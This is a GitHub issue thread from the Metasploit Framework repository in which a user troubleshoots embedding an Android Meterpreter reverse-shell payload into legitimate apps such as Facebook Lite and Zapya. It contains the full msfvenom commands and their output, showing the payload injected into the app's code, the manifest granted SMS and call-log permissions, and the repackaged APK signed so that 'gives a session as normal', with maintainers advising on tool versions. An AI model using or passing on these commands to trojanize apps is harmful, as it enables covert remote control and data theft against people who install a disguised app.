rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

App not installed #8724

Closed BlaacckK closed 7 years ago

BlaacckK commented 7 years ago

msfvenom -x Facebooklite_v_50.apk -p android/meterpret/reverse_tcp LHOST=IP LPORT=port -o /root/Desktop/Facebook.apk

I embedded a Metasploit payload in an APK using the above command. When I install it on Android running 6.0.1 it says "app not installed". However, a normal Android payload made with this command:

msfvenom -p android/meterpret/reverse_tcp LHOST=IP LPORT=port -o /root/Desktop/Facebook.apk

works great.

Thanks

busterb commented 7 years ago

Probably anti-reversing in Facebook. Try and compare to Uber.

BlaacckK commented 7 years ago

I tried with other apps; it works fine on most apps.

sempervictus commented 7 years ago

You may need to turn to some external backdooring tools for different apk protection schemes... At least till we have em covered here. Any notes you can compile while addressing this would help in that effort.

BlaacckK commented 7 years ago

msfvenom -x zapya.apk -p android/meterpreter/reverse_http LHOST=LHOST LPORT=4444 -o /root/Desktop/Zapya.apk
Using APK template: zapya.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.dewmobile.kuaiya.arjam
[*] Loading /tmp/d20170726-1573-17y8bl2/original/smali/com/dewmobile/kuaiya/app/MyApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding
[*] Adding
[*] Adding
[*] Adding
[*] Adding
[*] Adding
[*] Rebuilding zapya.apk with meterpreter injection as /tmp/d20170726-1573-17y8bl2/output.apk

For zapya it gets stuck here and doesn't go any further.

timwr commented 7 years ago

@BlaacckK I can't reproduce this. It injects into Facebook lite just fine:

msfvenom -x ../../apks/facebook_lite_v52.0.0.4.89.apk -p android/meterpreter/reverse_tcp LHOST=LHOST LPORT=4444 -o out.apk
Using APK template: ../../apks/facebook_lite_v52.0.0.4.89.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.xqrmc
[*] Loading /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/original/smali/com/facebook/lite/LiteAppShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Rebuilding ../../apks/facebook_lite_v52.0.0.4.89.apk with meterpreter injection as /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
[*] Signing /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
[*] Aligning /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
Payload size: 1263312 bytes
Saved as: out.apk
Success

The app can then be installed and gives a session as normal.

timwr commented 7 years ago

Do you have the latest apktool? I have 2.2.2:

$ apktool -v
Apktool v2.2.2 - a tool for reengineering Android apk files
with smali v2.1.3 and baksmali v2.1.3

BlaacckK commented 7 years ago

No, I have 2.2.1. That must be the problem. Thanks

BlaacckK commented 7 years ago

I'll upgrade it.